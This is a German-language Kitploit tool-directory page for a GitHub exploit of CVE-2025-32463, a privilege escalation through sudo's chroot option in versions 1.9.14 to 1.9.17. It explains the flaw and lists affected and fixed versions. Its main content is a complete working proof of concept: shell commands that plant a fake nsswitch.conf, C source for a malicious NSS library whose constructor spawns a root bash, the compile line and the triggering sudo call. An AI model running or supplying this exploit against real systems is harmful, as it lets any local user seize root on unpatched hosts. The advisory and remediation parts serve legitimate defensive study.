Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32463_exploit — Lokaler Privilege-Escalation-Exploit für sudo 1.9.14-1.9.17, der die chroot-Behandlung von CVE-2025-32463 ausnutzt und einen bösartigen NSS-Bibliothekskonstruktor platziert, um für jeden lokalen Benutzer eine Root-Shell zu starten. | Kitploit
Tools/GitHubGitHub/0xdak/cve-2025-32463_exploit
Privilege EscalationSchwachstellenanalyseExploitationPayload-Entwicklung
GitHub0xdak/cve-2025-32463_exploit

CVE-2025-32463_exploit

Lokaler Privilege-Escalation-Exploit für sudo 1.9.14-1.9.17, der die chroot-Behandlung von CVE-2025-32463 ausnutzt und einen bösartigen NSS-Bibliothekskonstruktor platziert, um für jeden lokalen Benutzer eine Root-Shell zu starten.

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
vor 17 TagenNoch nicht geprüft

CVE-2025-32463 — sudo „chwoot“ chroot lokale Privilegienerweiterung

Lokale Privilegienerweiterung auf root in sudo über die Option --chroot (-R). Funktioniert für jeden lokalen Benutzer, einschließlich Konten ganz ohne sudoers-Eintrag (z. B. www-data).

sudo 1.9.14 – 1.9.17 führt chroot() in das vom Benutzer angegebene Verzeichnis aus, während die sudoers-Richtlinie noch ausgewertet wird — d. h. vor der Autorisierungsentscheidung. Nach diesem chroot() lesen die NSS-Abfragen von sudo /etc/nsswitch.conf aus dem Chroot-Verzeichnis des Angreifers, und glibc wandelt einen gefälschten Quellnamen in dlopen("libnss_<name>.so.2") um — geladen und sein Konstruktor als root ausgeführt.

Das Platzieren einer gefälschten nsswitch.conf (passwd: /woot1337) zusammen mit einer bösartigen libnss_/woot1337.so.2, deren ELF-Konstruktor setreuid(0) + exec("/bin/bash") ausführt, führt zu einer Root-Shell. Der Exploit greift vor der sudoers-Prüfung, daher benötigt der Aufrufer keine sudo-Berechtigungen.

  • Betroffen: sudo 1.9.14 – 1.9.17
  • Behoben: 1.9.17p1 (die Chroot-Änderung aus 1.9.14 wurde zurückgenommen; die Funktion wurde als veraltet eingestuft)
  • CWE: 829 (Inclusion of Functionality from an Untrusted Control Sphere)
  • Auswirkung: jeder lokale Benutzer → root. Deterministischer Logikfehler (keine Speicherkorruption, kein Brute-Force).
  • Offengelegt von Rich Mirch (Stratascale), 2025.

Voraussetzungen

Python-3-Standardbibliothek, ein verwundbares setuid-sudo (1.9.14–1.9.17) und gcc auf dem Zielsystem (um das winzige libnss-Modul zu bauen). Als unprivilegierter Benutzer ausführen.

Verwendung

root@kitploit:~
python3 exploit.py            # -> interactive root shell
python3 exploit.py -c 'id'    # run a single command as root

Funktionsweise

  1. Ein Chroot-Verzeichnis mit etc/nsswitch.conf = passwd: /woot1337 anlegen (+ eine Kopie von /etc/group).
  2. libnss_/woot1337.so.2 kompilieren — ein ELF, dessen Konstruktor (__attribute__((constructor))) setreuid(0,0) und execl("/bin/bash", …) ausführt.
  3. sudo -R woot woot — sudo chrootet in woot, löst NSS auf, lädt libnss_/woot1337.so.2 per dlopen als root, und der Konstruktor liefert eine Root-Shell — bevor sudo überhaupt prüft, ob der Benutzer autorisiert ist.

Kanonischer manueller PoC (Stratascale / pr0v3rbs „chwoot“):

root@kitploit:~
cd $(mktemp -d); mkdir -p woot/etc libnss_
echo 'passwd: /woot1337' > woot/etc/nsswitch.conf; cp /etc/group woot/etc
cat > w.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void){setreuid(0,0);setregid(0,0);chdir("/");execl("/bin/bash","/bin/bash","-p",NULL);}
EOF
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 w.c
sudo -R woot woot        # -> root

Zielsystem prüfen

root@kitploit:~
sudo --version | head -1   # "Sudo version 1.9.14" .. "1.9.17" => vulnerable ; 1.9.17p1 => patched

Behebung

sudo auf ≥ 1.9.17p1 aktualisieren. Die Chroot-Funktion ist veraltet und sollte nicht mehr verwendet werden.

Haftungsausschluss

Nur für autorisierte Sicherheitstests und zu Bildungszwecken. Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben.

Tool herunterladen